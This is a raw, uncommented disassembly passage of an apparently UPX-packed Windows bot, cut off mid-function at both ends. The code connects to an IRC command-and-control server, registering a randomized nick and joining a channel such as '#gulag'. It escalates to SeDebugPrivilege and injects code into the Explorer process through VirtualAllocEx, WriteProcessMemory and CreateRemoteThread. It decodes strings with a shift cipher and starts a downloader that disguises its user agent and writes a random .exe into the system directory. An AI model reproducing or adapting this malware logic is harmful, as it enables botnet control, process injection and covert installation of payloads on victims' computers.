push offset loc_31304120
push eax
call sub_3130373E ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31301AC3: ; CODE XREF: sub_31301631+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31301AC3
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31303744 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31303744 ; memset
add esp, 18h
jmp loc_313018C8
; ---------------------------------------------------------------------------
loc_31301B17: ; CODE XREF: sub_31301631+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_31304788
push eax
call sub_3130373E ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_3130373E ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_31304808
push eax
call sub_3130373E ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_31301B6F: ; CODE XREF: sub_31301631+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_31301B7C: ; CODE XREF: sub_31301631+1AD�j
; sub_31301631+1E1�j ...
push 2
push [ebp+var_4]
call dword_31301174 ; shutdown
loc_31301B87: ; CODE XREF: sub_31301631+166�j
push [ebp+var_4]
call dword_3130118C ; closesocket
pop esi
loc_31301B91: ; CODE XREF: sub_31301631+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_31301631 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31301B98 proc near ; CODE XREF: UPX0:loc_31302DFB�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_313010DC ; GetModuleHandleA
mov esi, dword_313010D8
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_31301C1C
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_31301C1C
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_31301C1C
lea eax, [ebp+var_C]
push eax
push 20h
call dword_313010D4 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_31301C1C: ; CODE XREF: sub_31301B98+28�j
; sub_31301B98+37�j ...
pop edi
pop esi
leave
retn
sub_31301B98 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31301C20 proc near ; CODE XREF: UPX0:31302E0F�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_31304FFC
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_313010DC ; GetModuleHandleA
mov esi, dword_313010D8
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_31301C67
loc_31301C63: ; CODE XREF: sub_31301C20+54�j
push 1
jmp short loc_31301CB8
; ---------------------------------------------------------------------------
loc_31301C67: ; CODE XREF: sub_31301C20+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_31301C63
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31301128 ; FindWindowA
test eax, eax
jnz short loc_31301C95
call dword_3130112C ; GetForegroundWindow
test eax, eax
jnz short loc_31301C95
push 2
jmp short loc_31301CB8
; ---------------------------------------------------------------------------
loc_31301C95: ; CODE XREF: sub_31301C20+65�j
; sub_31301C20+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31301130 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_313010E4 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_31301CBB
push 3
loc_31301CB8: ; CODE XREF: sub_31301C20+45�j
; sub_31301C20+73�j
pop eax
jmp short loc_31301D26
; ---------------------------------------------------------------------------
loc_31301CBB: ; CODE XREF: sub_31301C20+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_313010A0
test eax, eax
jz short loc_31301D19
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_313010E0 ; WriteProcessMemory
push dword_31304FD0
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31301D05
push eax
call esi ; CloseHandle
jmp short loc_31301D20
; ---------------------------------------------------------------------------
loc_31301D05: ; CODE XREF: sub_31301C20+DE�j
push offset aUterm_9 ; "uterm_9"
call sub_31302A9B
pop ecx
mov [ebp+var_4], 5
jmp short loc_31301D20
; ---------------------------------------------------------------------------
loc_31301D19: ; CODE XREF: sub_31301C20+B2�j
mov [ebp+var_4], 4
loc_31301D20: ; CODE XREF: sub_31301C20+E3�j
; sub_31301C20+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_31301D26: ; CODE XREF: sub_31301C20+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31301C20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31301D2B proc near ; CODE XREF: sub_31301DB0+25�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31301D5E
add ebx, 1Ah
loc_31301D5E: ; CODE XREF: sub_31301D2B+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31301110
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31301D88
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31301DAB
; ---------------------------------------------------------------------------
loc_31301D88: ; CODE XREF: sub_31301D2B+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31301DA8
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31301DAB
; ---------------------------------------------------------------------------
loc_31301DA8: ; CODE XREF: sub_31301D2B+68�j
mov al, [ebp+arg_0]
loc_31301DAB: ; CODE XREF: sub_31301D2B+5B�j
; sub_31301D2B+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31301D2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31301DB0 proc near ; CODE XREF: sub_31302755+F8�p
; sub_31302755+139�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_31301E0B
mov edi, [ebp+arg_0]
push ebx
loc_31301DC5: ; CODE XREF: sub_31301DB0+56�j
mov bl, al
inc [ebp+arg_4]
mov eax, esi
mov byte ptr [ebp+arg_0], bl
neg eax
push eax
push [ebp+arg_0]
call sub_31301D2B
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_31301DEF
cmp bl, 7Ah
jg short loc_31301DEF
movsx esi, bl
sub esi, 61h
loc_31301DEF: ; CODE XREF: sub_31301DB0+32�j
; sub_31301DB0+37�j
cmp bl, 41h
jl short loc_31301DFF
cmp bl, 5Ah
jg short loc_31301DFF
movsx esi, bl
sub esi, 41h
loc_31301DFF: ; CODE XREF: sub_31301DB0+42�j
; sub_31301DB0+47�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_31301DC5
pop ebx
jmp short loc_31301E0E
; ---------------------------------------------------------------------------
loc_31301E0B: ; CODE XREF: sub_31301DB0+F�j
mov edi, [ebp+arg_0]
loc_31301E0E: ; CODE XREF: sub_31301DB0+59�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_31301DB0 endp
; =============== S U B R O U T I N E =======================================
sub_31301E15 proc near ; CODE XREF: UPX0:31302498�p
push esi
mov esi, ecx
push 20001h
call sub_31303717
mov [esi+2Ch], eax
pop ecx
mov eax, esi
pop esi
retn
sub_31301E15 endp
; =============== S U B R O U T I N E =======================================
sub_31301E2A proc near ; CODE XREF: UPX0:31302501�p
; UPX0:31302554�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push 27h
push [esp+8+arg_0]
lea eax, [esi+4]
push eax
call dword_313010AC ; lstrcpyn
mov eax, [esp+4+arg_4]
mov [esi+58h], eax
pop esi
retn 8
sub_31301E2A endp
; ---------------------------------------------------------------------------
loc_31301E48: ; CODE XREF: UPX0:313037C6�j
push esi
mov esi, ecx
lea eax, [esi+4]
push eax
call sub_3130372B
push dword ptr [esi+2Ch]
call sub_3130372B
pop ecx
pop ecx
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_31301E60 proc near ; CODE XREF: UPX0:3130251F�p
; UPX0:31302572�p
var_138 = byte ptr -138h
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 138h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
push ebx
push 1
mov esi, ecx
push 2
call dword_31301178 ; socket
mov [esi+5Ch], eax
lea eax, [esi+4]
push eax
call sub_31302B6B
mov [esi+64h], eax
mov ax, [esi+58h]
pop ecx
lea edi, [esi+60h]
push eax
mov word ptr [edi], 2
call dword_3130117C ; htons
push 10h
push edi
push dword ptr [esi+5Ch]
mov [esi+62h], ax
call dword_31301170 ; connect
test eax, eax
jnz loc_31302065
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31302065
mov ecx, [esi+2Ch]
and [ecx+eax], bl
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_313020A2
lea eax, [esp+148h+var_138]
push 9
push eax
call sub_31302AE5
mov ebp, dword_31301134
lea eax, [esp+150h+var_138]
push eax
lea eax, [esp+154h+var_12C]
push offset aPassS ; "PASS %s\r\n"
push eax
call ebp ; wsprintfA
mov edi, dword_313010D0
add esp, 14h
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push ebx
mov ebx, dword_313010CC
push eax
call ebx ; lstrlen
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_31301194 ; send
push [esp+148h+arg_0]
lea eax, [esp+14Ch+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; wsprintfA
add esp, 0Ch
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; lstrlen
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_31301194 ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31302065
mov ecx, [esi+2Ch]
push 64h
and byte ptr [ecx+eax], 0
call edi ; Sleep
loc_31301F89: ; CODE XREF: sub_31301E60+1AD�j
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_313020A2
push offset aAlready ; "already"
push dword ptr [esi+2Ch]
call dword_3130110C ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31302012
push [esp+148h+arg_4]
push [esp+14Ch+arg_0]
call sub_31302AE5
push [esp+150h+arg_0]
lea eax, [esp+154h+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; wsprintfA
add esp, 14h
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; lstrlen
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_31301194 ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_31302065
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
jmp loc_31301F89
; ---------------------------------------------------------------------------
loc_31302012: ; CODE XREF: sub_31301E60+145�j
push [esp+148h+arg_8]
lea eax, [esp+14Ch+var_12C]
push [esp+14Ch+arg_0]
push offset aUserS8S ; "USER %s 8 * :%s\r\n"
push eax
call ebp ; wsprintfA
add esp, 10h
push 64h
call edi ; Sleep
xor edi, edi
lea eax, [esp+148h+var_12C]
push edi
push eax
call ebx ; lstrlen
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_31301194 ; send
push edi
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_31302073
loc_31302065: ; CODE XREF: sub_31301E60+4E�j
; sub_31301E60+6B�j ...
push dword ptr [esi+5Ch]
call dword_3130118C ; closesocket
push 1
pop eax
jmp short loc_31302095
; ---------------------------------------------------------------------------
loc_31302073: ; CODE XREF: sub_31301E60+203�j
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_313020A2
mov [esi+180h], edi
mov [esi+7Ch], edi
mov [esi+70h], edi
mov [esi+74h], edi
xor eax, eax
loc_31302095: ; CODE XREF: sub_31301E60+211�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 138h
retn 0Ch
sub_31301E60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_313020A2 proc near ; CODE XREF: sub_31301E60+7C�p
; sub_31301E60+12E�p ...
var_190 = byte ptr -190h
var_64 = byte ptr -64h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
push ebx
push esi
push edi
push offset aPing ; "PING"
push [ebp+arg_0]
mov ebx, ecx
call dword_3130110C ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_3130211C
mov esi, dword_313010CC
lea edi, [eax+4]
push edi
call esi ; lstrlen
dec eax
cmp eax, 63h
jle short loc_313020DB
push 1
pop eax
jmp short loc_3130211E
; ---------------------------------------------------------------------------
loc_313020DB: ; CODE XREF: sub_313020A2+32�j
push eax
lea eax, [ebp+var_64]
push edi
push eax
call dword_313010AC ; lstrcpyn
lea eax, [ebp+var_64]
push eax
lea eax, [ebp+var_190]
push offset aPongS ; "PONG%s\r\n"
push eax
call dword_31301134 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_190]
push 0
push eax
call esi ; lstrlen
push eax
lea eax, [ebp+var_190]
push eax
push dword ptr [ebx+5Ch]
call dword_31301194 ; send
loc_3130211C: ; CODE XREF: sub_313020A2+20�j
xor eax, eax
loc_3130211E: ; CODE XREF: sub_313020A2+37�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_313020A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31302125 proc near ; CODE XREF: UPX0:313025C0�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 12Ch
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12C]
mov esi, ecx
push offset aJoinS ; "JOIN %s\r\n"
push eax
call dword_31301134 ; wsprintfA
mov edi, dword_313010D0
add esp, 0Ch
push 64h
call edi ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call dword_313010CC ; lstrlen
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [esi+5Ch]
call dword_31301194 ; send
push 64h
call edi ; Sleep
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31301190 ; recv
mov ecx, [esi+2Ch]
mov [esi], eax
and byte ptr [ecx+eax], 0
mov eax, [esi]
cmp eax, 0FFFFFFFFh
jz short loc_313021EE
test eax, eax
jz short loc_313021EE
push 64h
call edi ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_313020A2
mov edi, dword_3130110C
push offset a451 ; "451"
push dword ptr [esi+2Ch]
call edi ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_313021C7
push 3
jmp short loc_313021F0
; ---------------------------------------------------------------------------
loc_313021C7: ; CODE XREF: sub_31302125+9C�j
push offset aPing ; "PING"
push dword ptr [esi+2Ch]
call edi ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_313021DB
push 4
jmp short loc_313021F0
; ---------------------------------------------------------------------------
loc_313021DB: ; CODE XREF: sub_31302125+B0�j
push 23h
add esi, 30h
push [ebp+arg_0]
push esi
call dword_313010AC ; lstrcpyn
xor eax, eax
jmp short loc_313021F1
; ---------------------------------------------------------------------------
loc_313021EE: ; CODE XREF: sub_31302125+74�j
; sub_31302125+78�j
push 2
loc_313021F0: ; CODE XREF: sub_31302125+A0�j
; sub_31302125+B4�j
pop eax
loc_313021F1: ; CODE XREF: sub_31302125+C7�j
pop edi
pop esi
leave
retn 4
sub_31302125 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_313021F7 proc near ; CODE XREF: sub_31302260+72�p
; UPX0:3130261C�p
var_14C = byte ptr -14Ch
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 14Ch
push esi
mov esi, ecx
call dword_31301120 ; rand
sub eax, 3
and eax, 7
push eax
lea eax, [ebp+var_20]
push eax
call sub_31302AE5
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14C]
push offset aQuitS ; "QUIT %s\r\n"
push eax
call dword_31301134 ; wsprintfA
add esp, 14h
lea eax, [ebp+var_14C]
push 0
push eax
call dword_313010CC ; lstrlen
push eax
lea eax, [ebp+var_14C]
push eax
push dword ptr [esi+5Ch]
call dword_31301194 ; send
push dword ptr [esi+5Ch]
call dword_3130118C ; closesocket
xor eax, eax
pop esi
leave
retn
sub_313021F7 endp
; =============== S U B R O U T I N E =======================================
sub_31302260 proc near ; CODE XREF: UPX0:31302604�p
mov eax, offset sub_313037B4
call sub_31303790
sub esp, 110h
push ebx
push esi
push edi
mov edi, dword_313010E8
mov esi, ecx
mov [ebp-10h], esp
mov [ebp-14h], esi
call edi ; GetTickCount
mov [ebp-18h], eax
mov eax, [esi+5Ch]
mov dword ptr [ebp-11Ch], 1
mov [ebp-118h], eax
xor ebx, ebx
loc_3130229B: ; CODE XREF: sub_31302260+DE�j
call sub_31302BE5
test eax, eax
jz short loc_313022D7
push ebx
push ebx
lea eax, [ebp-11Ch]
push ebx
push eax
push 1
call dword_31301168 ; select
cmp eax, 0FFFFFFFFh
jz short loc_313022D7
mov [ebp-4], ebx
call edi ; GetTickCount
mov ecx, [ebp+8]
sub eax, [ebp-18h]
imul ecx, 0EA60h
cmp eax, ecx
jbe short loc_313022EA
mov ecx, esi
call sub_313021F7
loc_313022D7: ; CODE XREF: sub_31302260+42�j
; sub_31302260+59�j ...
xor eax, eax
loc_313022D9: ; CODE XREF: sub_31302260+F8�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_313022EA: ; CODE XREF: sub_31302260+6E�j
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_31302355
mov ecx, [esi+2Ch]
push 64h
mov [eax+ecx], bl
call dword_313010D0 ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_313020A2
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31302755
cmp eax, ebx
jnz short loc_313022D7
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_31302BE5
test eax, eax
jz short loc_313022D7
push 64h
call dword_313010D0 ; Sleep
jmp loc_3130229B
; ---------------------------------------------------------------------------
loc_31302343: ; DATA XREF: UPX0:3130382C�o
mov eax, [ebp-14h]
push dword ptr [eax+5Ch]
call dword_3130118C ; closesocket
mov eax, offset loc_31302355
retn
; ---------------------------------------------------------------------------
loc_31302355: ; CODE XREF: sub_31302260+A1�j
; DATA XREF: sub_31302260+EF�o
push 1
pop eax
jmp loc_313022D9
sub_31302260 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3130235D proc near ; CODE XREF: sub_31302755+9D�p
; sub_31302755+2BA�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 12Ch
push ebx
push esi
mov esi, dword_313010CC
push edi
push [ebp+arg_0]
mov edi, ecx
call esi ; lstrlen
push [ebp+arg_4]
mov ebx, eax
call esi ; lstrlen
add ebx, eax
cmp ebx, 10Eh
jle short loc_3130238C
push 1
pop eax
jmp short loc_313023CD
; ---------------------------------------------------------------------------
loc_3130238C: ; CODE XREF: sub_3130235D+28�j
push [ebp+arg_4]
lea eax, [ebp+var_12C]
push [ebp+arg_0]
push offset aPrivmsgSS ; "PRIVMSG %s %s\r\n"
push eax
call dword_31301134 ; wsprintfA
add esp, 10h
push 64h
call dword_313010D0 ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call esi ; lstrlen
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [edi+5Ch]
call dword_31301194 ; send
xor eax, eax
loc_313023CD: ; CODE XREF: sub_3130235D+2D�j
pop edi
pop esi
pop ebx
leave
retn 8
sub_3130235D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_313023D4 proc near ; CODE XREF: UPX0:313024AE�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
lea eax, [ebp+var_10]
push eax
call dword_3130109C ; GetSystemTime
movzx eax, [ebp+var_10]
movzx ecx, [ebp+var_E]
lea eax, [eax+eax*2]
add eax, ecx
movzx ecx, [ebp+var_A]
add eax, ecx
push eax
call dword_31301100 ; srand
mov eax, [ebp+arg_0]
push 7
mov byte ptr [eax], 23h
inc eax
push eax
call sub_31302AE5
push 8
push [ebp+arg_4]
call sub_31302AE5
add esp, 14h
call dword_31301120 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
mov [eax], edx
call sub_31302A6D
leave
retn
sub_313023D4 endp
; ---------------------------------------------------------------------------
loc_31302432: ; DATA XREF: sub_31302E37+77�o
mov eax, offset loc_313037CB
call sub_31303790
sub esp, 1E4h
push ebx
push esi
xor ebx, ebx
push edi
mov dword_31304F98, ebx
call sub_31302A6D
mov esi, dword_31301120
call esi ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp-4Ch]
add edx, ecx
push edx
push eax
call sub_31302AE5
cmp ds:dword_31305008, ebx
mov edi, dword_313010EC
pop ecx
pop ecx
jz short loc_31302487
lea eax, [ebp-4Ch]
push offset a_ ; "_"
push eax
call edi ; lstrcat
loc_31302487: ; CODE XREF: UPX0:3130247A�j
lea eax, [ebp-4Ch]
push offset a9 ; "9"
push eax
call edi ; lstrcat
lea ecx, [ebp-1F0h]
call sub_31301E15
mov [ebp-4], ebx
loc_313024A0: ; CODE XREF: UPX0:31302610�j
; UPX0:31302636�j
push offset dword_31304F9C
lea eax, [ebp-18h]
push offset dword_31304FA0
push eax
call sub_313023D4
add esp, 0Ch
loc_313024B6: ; CODE XREF: UPX0:313024CA�j
call sub_31302BE5
test eax, eax
jnz short loc_313024CC
push 3E8h
call dword_313010D0 ; Sleep
jmp short loc_313024B6
; ---------------------------------------------------------------------------
loc_313024CC: ; CODE XREF: UPX0:313024BD�j
xor ebx, ebx
call esi ; rand
push 7
cdq
pop ecx
idiv ecx
lea eax, [ebp-6Ch]
add edx, 5
push edx
push eax
call sub_31302AE5
pop ecx
xor edi, edi
pop ecx
loc_313024E7: ; CODE XREF: UPX0:3130252C�j
push 1A0Bh
mov eax, edi
push 2
cdq
pop ecx
idiv ecx
lea ecx, [ebp-1F0h]
push off_31304BC0[edx*4]
call sub_31301E2A
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_313010CC ; lstrlen
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-1F0h]
call sub_31301E60
test eax, eax
jz short loc_31302583
inc edi
cmp edi, 8
jl short loc_313024E7
xor edi, edi
loc_31302530: ; CODE XREF: UPX0:3130257F�j
call sub_31302BE5
test eax, eax
jz short loc_31302591
push 1A0Bh
call esi ; rand
push 0Dh
xor edx, edx
pop ecx
div ecx
lea ecx, [ebp-1F0h]
push off_31304BC0[edx*4]
call sub_31301E2A
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_313010CC ; lstrlen
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-1F0h]
call sub_31301E60
test eax, eax
jz short loc_3130258E
inc edi
cmp edi, 34h
jb short loc_31302530
jmp short loc_31302591
; ---------------------------------------------------------------------------
loc_31302583: ; CODE XREF: UPX0:31302526�j
push 1
pop ebx
mov dword_31304F98, ebx
jmp short loc_3130259A
; ---------------------------------------------------------------------------
loc_3130258E: ; CODE XREF: UPX0:31302579�j
push 1
pop ebx
loc_31302591: ; CODE XREF: UPX0:31302537�j
; UPX0:31302581�j
cmp dword_31304F98, 0
jz short loc_313025A9
loc_3130259A: ; CODE XREF: UPX0:3130258C�j
lea eax, [ebp-18h]
push offset aGulag ; "#gulag"
push eax
call dword_31301090 ; lstrcpy
loc_313025A9: ; CODE XREF: UPX0:31302598�j
test ebx, ebx
jz short loc_31302621
call sub_31302BE5
test eax, eax
jz short loc_31302621
loc_313025B6: ; CODE XREF: UPX0:313025DB�j
lea eax, [ebp-18h]
lea ecx, [ebp-1F0h]
push eax
call sub_31302125
test eax, eax
jz short loc_313025DD
push 3E8h
call dword_313010D0 ; Sleep
call sub_31302BE5
test eax, eax
jnz short loc_313025B6
loc_313025DD: ; CODE XREF: UPX0:313025C7�j
cmp dword_31304F98, 0
jz short loc_313025ED
mov edx, 0A8C0h
jmp short loc_313025FD
; ---------------------------------------------------------------------------
loc_313025ED: ; CODE XREF: UPX0:313025E4�j
call esi ; rand
cdq
mov ecx, 1F4h
idiv ecx
add edx, 578h
loc_313025FD: ; CODE XREF: UPX0:313025EB�j
push edx
lea ecx, [ebp-1F0h]
call sub_31302260
call sub_31302BE5
test eax, eax
jz loc_313024A0
lea ecx, [ebp-1F0h]
call sub_313021F7
loc_31302621: ; CODE XREF: UPX0:313025AB�j
; UPX0:313025B4�j
call esi ; rand
push 0Ah
cdq
pop ecx
idiv ecx
imul edx, 0EA60h
push edx
call dword_313010D0 ; Sleep
jmp loc_313024A0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3130263B proc near ; CODE XREF: sub_31302755+5F�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31301140 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_31302666
push 1
jmp loc_313026FC
; ---------------------------------------------------------------------------
loc_31302666: ; CODE XREF: sub_3130263B+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_313010B4 ; GetSystemDirectoryA
mov edi, dword_313010EC
lea eax, [ebp+var_110]
push offset asc_31304DDC ; "\\"
push eax
call edi ; lstrcat
lea eax, [ebp+var_110]
push 6
push eax
call dword_313010CC ; lstrlen
lea eax, [ebp+eax+var_110]
push eax
call sub_31302AE5
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset a_exe ; ".exe"
push eax
call edi ; lstrcat
push esi
push esi
push 2
push esi
push esi
